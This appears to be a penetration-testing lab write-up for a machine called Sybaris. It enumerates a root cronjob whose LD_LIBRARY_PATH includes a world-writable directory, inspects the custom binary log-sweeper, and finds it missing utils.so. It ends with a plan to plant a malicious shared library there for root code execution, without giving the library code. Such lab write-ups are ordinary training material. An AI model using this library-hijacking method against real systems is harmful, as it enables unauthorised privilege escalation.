InfoSec LAB

Sybaris_Cronjob

Created: 2 min read

Cronjob

[pablo@sybaris /]$ cat /etc/crontab | grep -v '^#'
SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
LD_LIBRARY_PATH=/usr/lib:/usr/lib64:/usr/local/lib/dev:/usr/local/lib/utils
MAILTO=""
 
 
  *  *  *  *  * root       /usr/bin/log-sweeper

A system-wide root cronjob has been identified, and this was also confirmed by PEAS at a later stage.

Writable LD_LIBRARY_PATH

[pablo@sybaris /]$ ll /usr/local/lib/dev
total 0
0 drwxrwxrwx  2 root root  6 Sep  7  2020 .
0 drwxr-xr-x. 4 root root 30 Sep  7  2020 ..

Another important key is that the LD_LIBRARY_PATH attribute in the crontab file above has the /usr/local/lib/dev directory, which is WRITABLE by anyone

log-sweeper

[pablo@sybaris /]$ ll /usr/bin/log-sweeper
12K -rwxr-xr-x. 1 root root 8.6K Sep  4  2020 /usr/bin/log-sweeper
 
[pablo@sybaris /]$ file /usr/bin/log-sweeper
/usr/bin/log-sweeper: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.32, BuildID[sha1]=b2507ccc8c1256db736f2a6c007d8993605e51fb, not stripped

log-sweeper is a custom 64 bit binary

[pablo@sybaris /]$ strings /usr/bin/log-sweeper
strings /usr/bin/log-sweeper
/lib64/ld-linux-x86-64.so.2
so*l
utils.so
__gmon_start__
ends_with
print_yellow
print_red
_init
print_green
_fini
libc.so.6
readdir
sprintf
perror
closedir
remove
opendir
__libc_start_main
_edata
__bss_start
_end
GLIBC_2.2.5
5"	 
%$	 
%"	 
[]A\A]A^A_
/var/log
opendir
/var/log/%s
;*3$"
GCC: (GNU) 4.8.5 20150623 (Red Hat 4.8.5-39)
crtstuff.c
__JCR_LIST__
deregister_tm_clones
__do_global_dtors_aux
completed.6355
__do_global_dtors_aux_fini_array_entry
frame_dummy
__frame_dummy_init_array_entry
sweeper.c
__FRAME_END__
__JCR_END__
__init_array_end
_DYNAMIC
__init_array_start
__GNU_EH_FRAME_HDR
_GLOBAL_OFFSET_TABLE_
__libc_csu_fini
remove@@GLIBC_2.2.5
print_green
print_yellow
_edata
opendir@@GLIBC_2.2.5
closedir@@GLIBC_2.2.5
__libc_start_main@@GLIBC_2.2.5
__data_start
__gmon_start__
__dso_handle
_IO_stdin_used
readdir@@GLIBC_2.2.5
__libc_csu_init
__bss_start
main
ends_with
print_red
perror@@GLIBC_2.2.5
sprintf@@GLIBC_2.2.5
__TMC_END__
.symtab
.strtab
.shstrtab
.interp
.note.ABI-tag
.note.gnu.build-id
.gnu.hash
.dynsym
.dynstr
.gnu.version
.gnu.version_r
.rela.dyn
.rela.plt
.init
.text
.fini
.rodata
.eh_frame_hdr
.eh_frame
.init_array
.fini_array
.jcr
.dynamic
.got
.got.plt
.data
.bss
.comment

Checking the strings within the binary reveals that it loads /lib64/ld-linux-x86-64.so.2 and utils.so libraries

[pablo@sybaris /]$ /usr/bin/log-sweeper
/usr/bin/log-sweeper: error while loading shared libraries: utils.so: cannot open shared object file: No such file or directory

Executing the binary reveals even more interesting factor that it fails to load the required utils.so library Given that one of the LD_LIBRARY_PATH is writable by anyone, I could plant a malicious SO file in the writable directory, and get code execution by having the binary load it through the cronjob

Interactive Graph View

Backlinks